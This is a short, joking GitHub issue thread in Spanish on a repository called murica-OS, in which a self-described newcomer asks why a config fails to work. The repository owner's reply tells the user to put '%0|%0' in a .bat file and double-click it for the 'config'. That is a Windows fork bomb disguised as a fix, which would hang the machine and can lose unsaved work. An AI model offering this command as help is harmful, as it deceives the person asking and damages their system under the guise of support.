### ISSUE TITLE
Una duda

### ISSUE THREAD

**Issue by HBlanqueto** [MrJakeSir/murica-OS#1]
Hola soy nuevo en Windows, está config esta muy BASADA, pero no me funciona en plan9. Alguna idea de qué me puede faltar? Adjunto  link: [Imagen](https://www.youtube.com/watch?v=dQw4w9WgXcQ)

**Comment by MrJakeSir** [comment]
en windows, tienes que crear un archivo .bat y poner el siguiente contenido **%0|%0**, despues, le das doble click al archivo ya guardado y listo, tendras tu config BASADA

**Comment by n00b-YaSh** [comment]
JAJAJAAJAJAJA
